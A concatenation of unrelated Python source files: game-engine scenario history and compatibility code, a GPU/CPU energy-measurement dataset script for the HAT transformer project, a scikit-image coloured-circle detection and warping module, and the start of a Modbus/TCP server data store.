self.data = cw.data.CWPyElementTree(element=cw.data.make_element("RecentHistory", ""))
self.data.fpath = fpath
self.data.write()
for e in self.data.getfind("."):
if e.tag == "Scenario":
path = e.gettext("WsnPath", "")
temppath = e.gettext("TempPath", "")
md5 = e.get("md5")
if os.path.isfile(path) and os.path.isdir(temppath) and md5:
self.scelist.append((path, md5, temppath))
temppath = os.path.normpath(temppath)
temppath = os.path.normcase(temppath)
temppaths.add(temppath)
if os.path.isdir(tempdir):
for name in os.listdir(tempdir):
path = cw.util.join_paths(tempdir, name)
if os.path.isdir(path):
path = os.path.normpath(path)
path = os.path.normcase(path)
if not path in temppaths:
cw.util.remove(path)
self.set_limit(limit)
def update_scenariopath(self, from_normpath, to_path):
seq = []
s = set()
for path, md5, temppath in self.scelist:
normpath2 = os.path.normcase(os.path.normpath(os.path.abspath(path)))
if normpath2 == from_normpath:
if normpath2 in s:
cw.util.remove(temppath)
continue
else:
s.add(normpath2)
path = to_path
if os.path.isfile(from_normpath):
md5 = cw.util.get_md5(from_normpath)
elif os.path.isfile(to_path):
md5 = cw.util.get_md5(to_path)
seq.append((path, md5, temppath))
self.scelist = seq
self.write()
def write(self):
# シナリオ履歴
data = self.data.getroot()
while len(data):
data.remove(data[-1])
for path, md5, temppath in self.scelist:
e_sce = cw.data.make_element("Scenario", "", {"md5": str(md5)})
e = cw.data.make_element("WsnPath", path)
e_sce.append(e)
e = cw.data.make_element("TempPath", temppath)
e_sce.append(e)
data.append(e_sce)
self.data.write()
def set_limit(self, value):
"""
保持履歴数を設定する。
履歴数を超えたデータは古い順から削除。
"""
self.limit = value
if self.limit and len(self.scelist) > self.limit:
while len(self.scelist) > self.limit:
self.remove(save=False)
self.write()
def moveend(self, path):
"""
引数のpathのデータを一番下に移動する。
"""
seq = [i for i in self.scelist if i[0] == path]
for i in seq:
self.scelist.remove(i)
self.scelist.append(i)
self.write()
def append(self, path, temppath, md5=None):
"""
path: wsn・zipファイルのパス。
temppath: "Data/Yado/<Yado>/Temp"に展開したフォルダパス。
設定数以上になったら、古いデータから削除。
"""
path = path.replace("\\", "/")
if not md5:
md5 = cw.util.get_md5(path)
temppath = temppath.replace("\\", "/")
self.remove(path, save=False)
self.scelist.append((path, md5, temppath))
while len(self.scelist) > self.limit:
self.remove(save=False)
self.write()
def remove(self, path="", save=True):
"""
path: 登録削除するwsn・zipファイルのパス。
空の場合は一番先頭にあるデータの登録を削除する。
"""
if not path:
cw.util.remove(self.scelist[0][2])
self.scelist.remove(self.scelist[0])
else:
path = path.replace("\\", "/")
seq = [i for i in self.scelist if i[0] == path]
for i in seq:
cw.util.remove(i[2])
self.scelist.remove(i)
if save:
self.write()
def check(self, path, md5=None):
"""
path: チェックするwsn・zipファイルのパス
"Data/Temp"フォルダに展開済みのwsn・zipファイルかどうかチェックし、
展開済みだった場合は、展開先のフォルダのパスを返す。
"""
path = path.replace("\\", "/")
if not md5:
md5 = cw.util.get_md5(path)
seq = []
seq.extend(self.scelist)
for i_path, i_md5, i_temppath in seq:
if not os.path.isfile(i_path) or not os.path.isdir(i_temppath):
self.remove(i_path)
continue
if i_path == path and i_md5 == md5:
return i_temppath
return None
class SystemCoupons(object):
"""称号選択分岐で特殊処理するシステムクーポン群。
シナリオ側からのエンジンのバージョン判定等に利用する。
CardWirth由来の"_1"~"_6"や"@MP3"は含まれない。
"""
def __init__(self, fpath=u"Data/SystemCoupons.xml", data=None):
self._normal = set() # 固定値
self._regexes = [] # 正規表現
self._ats = True # u"@"で始まる称号のみが含まれる場合はTrue
if data is None and os.path.isfile(fpath):
data = cw.data.xml2element(path=fpath)
if not data is None:
for e in data:
if self._ats and not e.text.startswith(u"@"):
self._ats = False
regex = e.getbool(".", "regex", False)
if regex:
self._regexes.append(re.compile(e.text))
else:
self._normal.add(e.text)
def match(self, coupon):
"""couponがシステムクーポンに含まれている場合はTrueを返す。
"""
if self._ats and not coupon.startswith(u"@"):
return False
if coupon in self._normal:
return True
for r in self._regexes:
if r.match(coupon):
return True
return False
class ScenarioCompatibilityTable(object):
"""互換性データベース。
*.wsmまたは*.widファイルのMD5ダイジェストをキーに、
本来そのファイルが再生されるべきCardWirthのバージョンを持つ。
ここでの判断の優先順位はシナリオのmode.iniより低い。
互換動作の判断は、
(1)メッセージ表示時の話者(キャストまたはカード)→(2)使用中のカード
→(3)エリア・バトル・パッケージ→(4)シナリオ本体
の優先順位で行う。このデータベースの情報はいずれにも適用される。
通常シナリオを互換モードで動かすにはSummary.wsmのMD5値をキーに
バージョンを登録すればよい。
Unix系列ではmd5コマンドで取得できるが、普通CardWirthのユーザは
Windowsユーザであるため、PowerShellを使う事になる。例えば:
$ [string]::concat(([Security.Cryptography.MD5]::Create().ComputeHash((gi Summary.wsm).OpenRead())|%{$_.ToString('x2')}))
Pythonでは次のようにして取得できる。
>>> import hashlib
>>> hashlib.md5(open("Summary.wsm", "rb").read()).hexdigest()
"""
def __init__(self):
self.table = {}
if os.path.isfile("Data/Compatibility.xml"):
data = cw.data.xml2element(path="Data/Compatibility.xml")
for e in data:
key = e.get("md5", "")
zindexmode = e.getattr(".", "zIndexMode", "")
vanishmembercancellation = e.getbool(".", "enableVanishMemberCancellation", False)
if key and (e.text or zindexmode or vanishmembercancellation):
self.table[key] = (e.text, zindexmode, vanishmembercancellation)
def get_versionhint(self, fpath=None, filedata=None):
"""fpathのファイル内容またはfiledataから、
本来そのファイルが再生されるべきCardWirthの
バージョンを取得する。
"""
if filedata:
key = hashlib.md5(filedata).hexdigest()
else:
key = cw.util.get_md5(fpath)
return self.table.get(key, None)
def lessthan(self, versionhint, currentversion):
"""currentversionがversionhint以下であればTrueを返す。"""
if not currentversion:
return False
if not currentversion[0]:
return False
if not versionhint:
return False
try:
return float(currentversion[0]) <= float(versionhint)
except:
return False
def zindexmode(self, currentversion):
"""メニューカードをプレイヤーカードより前に配置するモードで
あればTrueを返す。
"""
if not currentversion:
return False
if currentversion[1]:
try:
return float(currentversion[1]) <= float("1.20")
except:
return False
else:
return self.lessthan("1.20", currentversion)
def enable_vanishmembercancellation(self, currentversion):
"""パーティメンバが再配置される前であれば
対象消去がキャンセルされるモードであればTrueを返す。
"""
if not currentversion:
return False
return currentversion[2]
def merge_versionhints(self, hint1, hint2):
"""hint1を高優先度としてhint2とマージする。"""
if not hint1:
return hint2
if not hint2:
return hint1
engine = hint1[0]
if not engine:
engine = hint2[0]
zindexmode = hint1[1]
if not zindexmode:
zindexmode = hint2[1]
vanishmembercancellation = hint1[2]
if not vanishmembercancellation:
vanishmembercancellation = hint2[2]
gossiprestration = hint1[3]
if not gossiprestration:
gossiprestration = hint2[3]
compstamprestration = hint1[4]
if not compstamprestration:
compstamprestration = hint2[4]
return (engine, zindexmode, vanishmembercancellation, gossiprestration, compstamprestration)
def from_basehint(self, basehint):
"""basehintから複合情報を生成する。"""
if not basehint:
return None
return (basehint, "", False, False, False)
def to_basehint(self, versionhint):
"""複合情報versionhintから最も基本的な情報を取り出す。"""
if versionhint:
return versionhint[0] if versionhint[0] else ""
else:
return ""
def read_modeini(self, fpath):
"""クラシックなシナリオのmode.iniから互換性情報を読み込む。
互換性情報が無いか、読込に失敗した場合はNoneを返す。
"""
try:
conf = ConfigParser.SafeConfigParser()
conf.read(fpath)
try:
engine = conf.get("Compatibility", "engine")
except:
engine = ""
try:
zindexmode = conf.get("Compatibility", "zIndexMode")
except:
zindexmode = ""
try:
vanishmembercancellation = conf.get("Compatibility", "enableVanishMemberCancellation")
vanishmembercancellation = cw.util.str2bool(vanishmembercancellation)
except:
vanishmembercancellation = False
if engine or zindexmode or vanishmembercancellation:
return (engine, zindexmode, vanishmembercancellation)
except Exception:
cw.util.print_ex()
return None
|
energy_dataset.py | # HAT: Hardware-Aware Transformers for Efficient Natural Language Processing
# Hanrui Wang, Zhanghao Wu, Zhijian Liu, Han Cai, Ligeng Zhu, Chuang Gan and Song Han
# The 58th Annual Meeting of the Association for Computational Linguistics (ACL), 2020.
# Paper: https://arxiv.org/abs/2005.14187
# Project page: https://hanruiwang.me/project_pages/hat/
import torch
import time
import pdb
import numpy as np
from fairseq import checkpoint_utils, distributed_utils, options, tasks, utils
from tqdm import tqdm
import threading
import pynvml
delay = 0.1
def measureEnergy(runningThread, delay):
powers = []
pynvml.nvmlInit()
handle = pynvml.nvmlDeviceGetHandleByIndex(1)
# while(~runningThread.is_alive()):
i=0
while(i<10):
powers.append(pynvml.nvmlDeviceGetPowerUsage(handle))
time.sleep(delay)
i+=1
pynvml.nvmlShutdown()
energy = np.sum(powers)*delay
print(powers)
print(energy)
return energy
def main(args):
utils.import_user_module(args)
assert args.max_tokens is not None or args.max_sentences is not None, \
'Must specify batch size either with --max-tokens or --max-sentences'
# Initialize CUDA and distributed training
if torch.cuda.is_available() and not args.cpu:
torch.cuda.set_device(args.device_id)
torch.manual_seed(args.seed)
# Print args
print(args)
# Setup task
task = tasks.setup_task(args)
# Build model
model = task.build_model(args)
print(model)
# specify the length of the dummy input for profile
# for iwslt, the average length is 23, for wmt, that is 30
dummy_sentence_length_dict = {'iwslt': 23, 'wmt': 30}
if 'iwslt' in args.arch:
dummy_sentence_length = dummy_sentence_length_dict['iwslt']
elif 'wmt' in args.arch:
dummy_sentence_length = dummy_sentence_length_dict['wmt']
else:
raise NotImplementedError
dummy_src_tokens = [2] + [7] * (dummy_sentence_length - 1)
dummy_prev = [7] * (dummy_sentence_length - 1) + [2]
# for energy predictor: energy dataset generation
with open(args.lat_dataset_path, 'w') as fid:
src_tokens_test = torch.tensor([dummy_src_tokens], dtype=torch.long)
src_lengths_test = torch.tensor([dummy_sentence_length])
prev_output_tokens_test_with_beam = torch.tensor([dummy_prev] * args.beam, dtype=torch.long)
if args.latcpu:
model.cpu()
print('Measuring model energy on CPU for dataset generation...')
elif args.latgpu:
model.cuda()
src_tokens_test = src_tokens_test.cuda()
src_lengths_test = src_lengths_test.cuda()
prev_output_tokens_test_with_beam = prev_output_tokens_test_with_beam.cuda()
src_tokens_test.get_device()
print('Measuring model energy on GPU for dataset generation...')
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
feature_info = utils.get_feature_info()
fid.write(','.join(feature_info) + ',')
energy_info = ['energy_mean_encoder', 'energy_mean_decoder', 'energy_std_encoder', 'energy_std_decoder']
fid.write(','.join(energy_info) + '\n')
for i in range(args.lat_dataset_size):
print(i)
config_sam = utils.sample_configs(utils.get_all_choices(args), reset_rand_seed=False, super_decoder_num_layer=args.decoder_layers)
features = utils.get_config_features(config_sam)
fid.write(','.join(map(str, features)) + ',')
model.set_sample_config(config_sam)
# dry runs
for _ in range(5):
encoder_out_test = model.encoder(src_tokens=src_tokens_test, src_lengths=src_lengths_test)
encoder_energies = []
print('Measuring encoder for dataset generation...')
for _ in tqdm(range(args.latiter)):
if args.latgpu:
start.record()
elif args.latcpu:
start = time.time()
powers = []
pynvml.nvmlInit()
handle = pynvml.nvmlDeviceGetHandleByIndex(1)
thread_encoder = threading.Thread(target=model.encoder, args=(src_tokens_test, src_lengths_test))
thread_encoder.start()
while(thread_encoder.is_alive()):
powers.append(pynvml.nvmlDeviceGetPowerUsage(handle))
time.sleep(0.001)
pynvml.nvmlShutdown()
power = np.average(powers)
if args.latgpu:
end.record()
torch.cuda.synchronize()
encoder_energies.append(start.elapsed_time(end)*power/1000000) #the result is J
if not args.latsilent:
print('Encoder one run on GPU (for dataset generation): ', start.elapsed_time(end)*power/1000000)
elif args.latcpu:
end = time.time()
encoder_energies.append((end - start) * power / 1000)
if not args.latsilent:
print('Encoder one run on CPU (for dataset generation): ', (end - start)*power/1000)
# only use the 10% to 90% energies to avoid outliers
encoder_energies.sort()
encoder_energies = encoder_energies[int(args.latiter * 0.1): -max(1, int(args.latiter * 0.1))]
print(f'Encoder energy for dataset generation: Mean: {np.mean(encoder_energies)} J; \t Std: {np.std(encoder_energies)} J')
bsz = 1
new_order = torch.arange(bsz).view(-1, 1).repeat(1, args.beam).view(-1).long()
if args.latgpu:
new_order = new_order.cuda()
encoder_out_test_with_beam = model.encoder.reorder_encoder_out(encoder_out_test, new_order)
# dry runs
for _ in range(5):
model.decoder(prev_output_tokens=prev_output_tokens_test_with_beam,
encoder_out=encoder_out_test_with_beam)
# decoder is more complicated because we need to deal with incremental states and auto regressive things
decoder_iterations_dict = {'iwslt': 23, 'wmt': 30}
if 'iwslt' in args.arch:
decoder_iterations = decoder_iterations_dict['iwslt']
elif 'wmt' in args.arch:
decoder_iterations = decoder_iterations_dict['wmt']
decoder_energies = []
print('Measuring decoder for dataset generation...')
for _ in tqdm(range(args.latiter)):
if args.latgpu:
start.record()
elif args.latcpu:
start = time.time()
powers = []
pynvml.nvmlInit()
handle = pynvml.nvmlDeviceGetHandleByIndex(1)
incre_states = {}
for k_regressive in range(decoder_iterations):
thread_decoder = threading.Thread(target=model.decoder, args=((prev_output_tokens_test_with_beam[:, :k_regressive + 1], encoder_out_test_with_beam, incre_states)))
thread_decoder.start()
while(thread_decoder.is_alive()):
powers.append(pynvml.nvmlDeviceGetPowerUsage(handle))
time.sleep(0.001)
pynvml.nvmlShutdown()
# print(powers)
power = np.average(powers)
if args.latgpu:
end.record()
torch.cuda.synchronize()
decoder_energies.append(start.elapsed_time(end)*power/1000000) #the result is J
if not args.latsilent:
print('Decoder one run on GPU (for dataset generation): ', start.elapsed_time(end)*power/1000000)
elif args.latcpu:
end = time.time()
decoder_energies.append((end - start) * power / 1000)
if not args.latsilent:
print('Decoder one run on CPU (for dataset generation): ', (end - start)*power)
# only use the 10% to 90% energies to avoid outliers
decoder_energies.sort()
decoder_energies = decoder_energies[int(args.latiter * 0.1): -max(1, int(args.latiter * 0.1))]
print(decoder_energies)
print(f'Decoder energy for dataset generation: Mean: {np.mean(decoder_energies)} J; \t Std: {np.std(decoder_energies)} J')
lats = [np.mean(encoder_energies), np.mean(decoder_energies), np.std(encoder_energies), np.std(decoder_energies)]
fid.write(','.join(map(str, lats)) + '\n')
def cli_main():
parser = options.get_training_parser()
parser.add_argument('--latgpu', action='store_true', help='measure SubTransformer energy on GPU')
parser.add_argument('--latcpu', action='store_true', help='measure SubTransformer energy on CPU')
parser.add_argument('--latiter', type=int, default=300, help='how many iterations to run when measure the energy')
parser.add_argument('--latsilent', action='store_true', help='keep silent when measure energy')
parser.add_argument('--lat-dataset-path', type=str, default='./energy_dataset/lat.tmp', help='the path to write energy dataset')
parser.add_argument('--lat-dataset-size', type=int, default=200, help='number of data points for the dataset')
options.add_generation_args(parser)
args = options.parse_args_and_arch(parser)
if args.latcpu:
args.cpu = True
args.fp16 = False
if args.pdb:
pdb.set_trace()
main(args)
if __name__ == '__main__':
cli_main()
|
cv.py | #!/usr/bin/env python3
import numpy, sys, io, os, time, threading
import scipy.misc
from skimage import color, transform
from skimage.io import imread
from skimage.util import img_as_ubyte
from skimage.feature import canny, peak_local_max, corner_fast, corner_foerstner, corner_harris, corner_kitchen_rosenfeld, corner_moravec, corner_shi_tomasi
from skimage.transform import hough_ellipse, hough_circle, rescale
from skimage.draw import ellipse_perimeter, circle_perimeter
from skimage.filters import roberts, sobel, scharr, prewitt
def detect_colored_circles(rgb_img, radius_range, hsv_color_ranges, debug=False, counter=0):
"""
Detects circles filled with color contained in hsv_color_ranges
Returns: Collection of circle centers for each color as dictionary
"""
min_radius, max_radius = radius_range
start_all = time.time()
save_image('0_photo_'+str(counter), rgb_img)
# convert image to gray
print('convert rgb image to grayscale ...')
start = time.time()
gray_img = rgb2gray(rgb_img)
print('finished, duration: ',time.time()-start,'seconds')
print()
# find edges in image
print('find edges in grayscale image ...')
start = time.time()
edges_img = canny(gray_img, sigma=15.0, low_threshold=0.55, high_threshold=0.8)
#edges_img = corner_fast(gray_img, n=9, threshold=1.2)
#edges_img = corner_foerstner(gray_img)[0]
#edges_img = corner_harris(gray_img, method='k', k=0.05, eps=1e-06, sigma=1)
#edges_img = corner_kitchen_rosenfeld(gray_img, mode='constant', cval=0)
#edges_img = corner_moravec(gray_img, window_size=1)
#edges_img = corner_shi_tomasi(gray_img, sigma=0.1)
#edges_img = roberts(gray_img)
#edges_img = sobel(gray_img)
#edges_img = scharr(gray_img)
#edges_img = prewitt(gray_img)
print('finished, duration: ',time.time()-start,'seconds')
save_image('1_edges_'+str(counter), edges_img)
print()
# find circles from edge_image
print('find circles in image ...')
start = time.time()
hough_radii, hough_res = find_circles(edges_img, min_radius, max_radius)
print('finished, duration: ',time.time()-start,'seconds')
print("#Circles: ", count_circles_of_2d_array(hough_res))
print()
#
print('eliminating with peak_local_max ...')
start = time.time()
centers, accums, radii = circles_per_radius(hough_radii, hough_res, number_circles_per_radius=16)
print('finished, duration: ',time.time()-start,'seconds')
print("#Circles: ", len(accums))
print()
# hsv color debug
if debug: debug_points(centers, accums, rgb_img)
print('finding coordinates by color of circles ...')
start = time.time()
color_coords_dictionary, debug_img = find_circles_by_color(centers, accums, radii, rgb_img, hsv_color_ranges, debug)
print('finished, duration: ',time.time()-start,'seconds')
print('#Circles: ',count_circles_of_dictionary_with_arrays(color_coords_dictionary))
color_not_found = False
for key, array in color_coords_dictionary.items():
print('\t',key,':\t',len(array))
if len(array) == 0:
color_not_found = True
else:
arr = []
for i in range(len(array)):
coord = array[i]
rgb = rgb_img[coord[0], coord[1]]
hsv = rgb2hsv((rgb[0], rgb[1], rgb[2]))
arr.append(hsv)
print('\t',hsv)
avg = numpy.average(arr, axis=0)
print('avg',avg)
print()
save_image('2_detected_circles_'+str(counter), debug_img)
print()
print('total duration: ',time.time()-start_all,'seconds')
print()
if color_not_found:
print('less than 4 corners for calibration detected, quitting')
return None
color_coords = calc_coordinate_averages(color_coords_dictionary)
print('Coordiantes: ',color_coords)
return color_coords
def detect_colored_circles_no_prints(rgb_img, radius_range, hsv_color_ranges):
"""
Detects circles by color as above, without prints.
"""
min_radius, max_radius = radius_range
# convert image to gray
gray_img = rgb2gray(rgb_img)
# find edges in image
edges_img = canny(gray_img, sigma=15.0, low_threshold=0.55, high_threshold=0.8)
# find circles from edge_image
hough_radii, hough_res = find_circles(edges_img, min_radius, max_radius)
#
centers, accums, radii = circles_per_radius(hough_radii, hough_res, number_circles_per_radius=16)
color_coords_dictionary, debug_img = find_circles_by_color(centers, accums, radii, rgb_img, hsv_color_ranges, False)
color_not_found = False
for key, array in color_coords_dictionary.items():
if len(array) == 0: color_not_found = True
if color_not_found:
return None
color_coords = calc_coordinate_averages(color_coords_dictionary)
return color_coords
def find_circles(edges_img, min_radius, max_radius):
"""
Finds circles using the Hough transformation
For each radius a Hough transformation matrix is calculated and retured
"""
hough_radii = numpy.arange(min_radius, max_radius, 1)
hough_res = hough_circle(edges_img, hough_radii)
return (hough_radii, hough_res)
def circles_per_radius(hough_radii, hough_res, number_circles_per_radius=16):
"""
Rates found circles by intensity of peaks inside the Hough matrix.
Chooses the best circles for each radius
Returns: Selected circle centers with their quality and radius
"""
centers = []
accums = []
radii = []
# for each radius and hough peak image
# zip([32,33,34,35,36],[(32, hough_peaks_img),(33, hough_peaks_img),(34, hough_peaks_img), ... ])
for radius, h in zip(hough_radii, hough_res): # iterieren durch circles (h)
# sort peaks, which represent the quality of circles by intensity
peaks = peak_local_max(h, num_peaks=number_circles_per_radius)
centers.extend(peaks)
accums.extend(h[peaks[:, 0], peaks[:, 1]])
# iterate through every (y,x) in peaks and get corresponding color value from h, which represents quality value of circle (?)
# so acuums represents quality
radii.extend([radius] * number_circles_per_radius)
#
return (centers, accums, radii)
def find_circles_by_color(centers, accums, radii, rgb_img, hsv_color_ranges, debug):
"""
Finds circles by given hsv color ranges for each color key
Returns: Dictionary with color key and coordinates
"""
debug_img = numpy.zeros((len(rgb_img), len(rgb_img[0]), 3), dtype=numpy.uint8) # start with black image
coords = {}
for color, array in hsv_color_ranges.items(): # initialize coords
coords[color] = []
for idx in numpy.argsort(accums)[::-1][:]: # sort by quality (accums)
center_y, center_x = centers[idx]
pixel_color = rgb_img[center_y, center_x]
# if valid color was found, add it to coords list to specific color key
found_color = identify_color(pixel_color, hsv_color_ranges, debug) # string of color
if found_color is not None:
coords[found_color].append(centers[idx])
debug_img = add_circle_outlines_to_image(debug_img, center_y, center_x, radii[idx], pixel_color)
else:
if debug:
# draw also all circles not matching the specific colors, but in dark gray
debug_img = add_circle_outlines_to_image(debug_img, center_y, center_x, radii[idx], (255,255,255))
print('@ coord (x,y)', center_x, ', ', center_y, '\n')
return (coords, debug_img)
def calc_coordinate_averages(coord_arrays):
"""
Calculate average of all coordinate touples for the correct color
parameter: dictionary with color key and value as array of coords in (y,x)
returns: dictionary with color key and value as array of coords in (x,y)!!!
"""
# TODO: Sort out all circles not matching specific pixel range
coords = {}
for key, array in coord_arrays.items():
temp = numpy.average(array, axis=0)
coords[key] = (int(temp[1]), int(temp[0]))
return coords
#########################################################################################################
#########################################################################################################
def add_circle_outlines_to_image(image, center_y, center_x, radius, color):
"""
This method draws an outline of a circle with the given position, color and radius to the image
"""
# paramters: y, x, radius; returns y, x
cy, cx = circle_perimeter(center_y, center_x, radius, method='bresenham', shape=(len(image), len(image[0])))
image[cy, cx] = color
return image
def add_rect_outlines_to_image(image, upper_left, lower_right, color):
"""
Draw rectange depending on the upper_left and lower_right corners.
"""
for y in range(upper_left[1], lower_right[1]):
x = upper_left[0]
if 0 <= y < len(image) and 0 <= x < len(image[0]): image[y][x] = color
for y in range(upper_left[1], lower_right[1]):
x = lower_right[0]
if 0 <= y < len(image) and 0 <= x < len(image[0]): image[y][x] = color
for x in range(upper_left[0], lower_right[0]):
y = upper_left[1]
if 0 <= y < len(image) and 0 <= x < len(image[0]): image[y, x] = color
for x in range(upper_left[0], lower_right[0]):
y = lower_right[1]
if 0 <= y < len(image) and 0 <= x < len(image[0]): image[y, x] = color
def identify_color(pixel_color, hsv_color_ranges, debug=False):
"""
This method compares colors to red, green, blue and white
using the HSV color model to be able to detect colors more or
less reliable, even for various light situations from a photo
parameters: triple of rgb values
returns: string of color ('blue', 'green', 'red', 'white') or None
"""
hsv = rgb2hsv(pixel_color)
couldbe = {}
for color, color_range in hsv_color_ranges.items(): # for every hsv color range in hsv_color_ranges
couldbe[color] = 0
for i in range(0,3): # for every channel
if i is 0 and color_range[0][i] > color_range[1][i]: # if it is h and min and max are reversed
# its red, so from 0 to max or min to 1
if (0. <= hsv[i] <= color_range[1][i]) or (color_range[0][i] <= hsv[i] <= 1.): couldbe[color] += 1
else:
## if hsv channel between hsv color range_min and range_max
if color_range[0][i] <= hsv[i] <= color_range[1][i]: couldbe[color] +=1
# save all colors where score in couldbe is 3, so all channels have matched
# should not happen, but this is good for debugging the hsv color ranges
possible_colors = []
for color, weight in couldbe.items():
if weight == 3: # matches all three channels
possible_colors.append(color)
if len(possible_colors) == 0:
if debug: print('COLOR: matches no color\t\t',pixel_color, ' (rgb)\t\t',hsv,'(hsv)')
return None
elif len(possible_colors) == 1:
if debug: print('COLOR: should be', possible_colors[0], '\t\t',pixel_color, ' (rgb)')
return possible_colors[0]
elif len(possible_colors) > 1:
print('COLOR: CONFLICT! matches multiple colors (',possible_colors,')\t\t',pixel_color,' (rgb)\t',hsv,'(hsv)')
return None
def rgb2hsv(rgb):
"""
Converts an RGB pixel to HSV
scikit-image rgb2hsv method just accepts image arrays, so we make an array with one pixel
"""
x = numpy.zeros((1,1,3))
x[0,0] = rgb
return color.rgb2hsv(x)[0][0]
def count_circles_of_2d_array(array):
"""
Returns: Total number of circles in array
"""
total_circles = 0
for row in range(len(array)):
total_circles += len(array[row])
return total_circles
def count_circles_of_dictionary_with_arrays(dictionary):
"""
Returns: Total number of circles in dictionary
"""
total_circles = 0
for key, array in dictionary.items():
total_circles += len(array)
return total_circles
def rgb2gray(rgb_img):
"""
python/numpy magic
converting an rgb image array to grayscale array
"""
temp = numpy.array(rgb_img, copy=True)
return numpy.dot(temp[...,:3],[0.2989,0.5870,0.1140])
def save_image(name, image, img_type='jpg'):
"""
Saves image within a thread for better performance.
"""
def save():
path = './doc/'+name+'.'+img_type
scipy.misc.imsave(path, image)
threading.Thread(target=save).start()
#########################################################################################################
#########################################################################################################
def calibrate_colors(rgb_img, radius_range, searched_range, counter=0):
"""
This method defines a color range as hsv color touple depending on detected circles inside a rgb image.
The algorithm finds circles inside the rgb image. Every circle whose center coordinate fits a pixel
range in searched_range is stored. For each collection the minimum and maximum hsv channel values
are returned.
Returns: hsv color range, min m
"""
min_radius, max_radius = radius_range
# convert image to gray
gray_img = rgb2gray(rgb_img)
# find edges in image
edges_img = canny(gray_img, sigma=15.0, low_threshold=0.55, high_threshold=0.8)
save_image('calibrate_edges_'+str(counter), edges_img)
# find circles from edge_image
hough_radii, hough_res = find_circles(edges_img, min_radius, max_radius)
centers, accums, radii = circles_per_radius(hough_radii, hough_res, number_circles_per_radius=16)
def in_range(coords, key):
in_picture = 0 <= coords[0] <= len(rgb_img) and 0 <= coords[1] <= len(rgb_img[0])
x_okay = searched_range[key][0][0] <= coords[1] <= searched_range[key][1][0]
y_okay = searched_range[key][0][1] <= coords[0] <= searched_range[key][1][1]
return in_picture and x_okay and y_okay
debug_img = numpy.zeros((len(rgb_img), len(rgb_img[0]), 3), dtype=numpy.uint8)
# initialize
correct_colors= {}
hsv_color_ranges = {}
for key, coord_range in searched_range.items():
correct_colors[key] = []
hsv_color_ranges[key] = None
for idx in numpy.argsort(accums)[::-1][:]: # nach quali sortieren (beste x)
center_y, center_x = centers[idx]
add_circle_outlines_to_image(debug_img, center_y, center_x, radii[idx], rgb_img[center_y, center_x])
# get all circle centers to the correct array
for key, coord_range in searched_range.items():
if in_range(centers[idx], key):
# get rgb color of center
rgb_color = rgb_img[center_y, center_x]
hsv_color = rgb2hsv(rgb_color)
correct_colors[key].append(hsv_color)
for key, coord_range in searched_range.items():
#add_circle_outlines_to_image(debug_img, coord_range[0][1], coord_range[0][0], 5, [255,250,0])
#add_circle_outlines_to_image(debug_img, coord_range[1][1], coord_range[1][0], 5, [255,250,0])
add_rect_outlines_to_image(debug_img, coord_range[0], coord_range[1], [255,250,0])
save_image('calibrate_circles_'+str(counter), debug_img)
for key, color_array in correct_colors.items():
if len(color_array) == 0:
print('at least one color not detected')
return None
for key, color_array in correct_colors.items():
h_min = None
s_min = None
v_min = None
h_max = None
s_max = None
v_max = None
for i in range(len(color_array)):
hsv = color_array[i]
h_min = hsv[0] if h_min is None or h_min > hsv[0] else h_min
s_min = hsv[1] if s_min is None or s_min > hsv[1] else s_min
v_min = hsv[2] if v_min is None or v_min > hsv[2] else v_min
h_max = hsv[0] if h_max is None or h_max < hsv[0] else h_max
s_max = hsv[1] if s_max is None or s_max < hsv[1] else s_max
v_max = hsv[2] if v_max is None or v_max < hsv[2] else v_max
color_tolerance = 0.02 # 2%
correct_colors[key] = ((h_min-color_tolerance, s_min-color_tolerance , v_min-(color_tolerance*256)),(h_max+color_tolerance, s_max+color_tolerance, v_max+(color_tolerance*256)))
return correct_colors
#########################################################################################################
#########################################################################################################
def warp_david(img, edges):
"""
Warpes an image by keeping its size, transforming the pixel data to
be distorted between the four corners.
David style => slow ...
"""
width = len(img[1])
height = len(img)
warped = numpy.empty((width, height, 3), dtype=numpy.uint8)
for x in range(width):
x_share = x / width
x_share_comp = 1 - x_share
y_start = edges['upper_left'][1] * x_share_comp + edges['upper_right'][1] * x_share
y_end = edges['lower_left'][1] * x_share_comp + edges['lower_right'][1] * x_share
for y in range(height):
y_share = y / height
y_share_comp = 1 - y_share
x_start = edges['upper_left'][0] * y_share_comp + edges['lower_left'][0] * y_share
x_end = edges['upper_right'][0] * y_share_comp + edges['lower_right'][0] * y_share
x_len = x_end - x_start
y_len = y_end - y_start
x_new = x_start + x_share * x_len
y_new = y_start + y_share * y_len
warped[int(x_new), int(y_new)] = (img[y,x][0], img[y,x][1], img[y,x][2])
return warped
def warp(img, corners):
"""
Warpes an image by keeping its size, transforming the pixel data to
be distorted between the four corners.
"""
width = len(img[0])
height = len(img)
src = numpy.array((
corners['upper_left'],
corners['lower_left'],
corners['lower_right'],
corners['upper_right']
))
dst = numpy.array((
(0, 0),
(0, height),
(width, height),
(width, 0)
))
tform = transform.ProjectiveTransform()
tform.estimate(src, dst)
return transform.warp(img, tform, output_shape=(height,width))
def scale_to_fit(img, size):
"""
Scales an image to a given size by warping with no regard to the ratio.
Returns: warped image as ndarray
"""
width = len(img[0])
height = len(img)
src = numpy.array((
(0, 0),
(0, size[1]),
(size[0], size[1]),
(size[0], 0)
))
dst = numpy.array((
(0, 0),
(0, height),
(width, height),
(width, 0)
))
tform = transform.ProjectiveTransform()
tform.estimate(src, dst)
return transform.warp(img, tform, output_shape=(size[1],size[0]))
#########################################################################################################
#########################################################################################################
if __name__ == '__main__':
print('Start the program with \'python3 start.py\', you are wrong here.')
|
server.py | # -*- coding: utf-8 -*-
# Python module: ModbusServer class (ModBus/TCP Server)
from . import constants as const
from .utils import test_bit, set_bit
import socket
import struct
from threading import Lock, Thread
# for python2 compatibility
try:
from socketserver import BaseRequestHandler, ThreadingTCPServer
except ImportError:
from SocketServer import BaseRequestHandler, ThreadingTCPServer
class DataBank:
""" Data class for thread safe access to bits and words space """
bits_lock = Lock()
bits = [False] * 0x10000
words_lock = Lock()
words = [0] * 0x10000
@classmethod
def get_bits(cls, address, number=1):
with cls.bits_lock:
if (address >= 0) and (address + number <= len(cls.bits)):
return cls.bits[address: number + address]
else:
return None
@classmethod
def set_bits(cls, address, bit_list):
with cls.bits_lock:
if (address >= 0) and (address + len(bit_list) <= len(cls.bits)):
cls.bits[address: address + len(bit_list)] = bit_list
return True
else:
return None
@classmethod
def get_words(cls, address, number=1):
with cls.words_lock:
if (address >= 0) and (address + number <= len(cls.words)):
return cls.words[address: number + address]
else:
return None
@classmethod
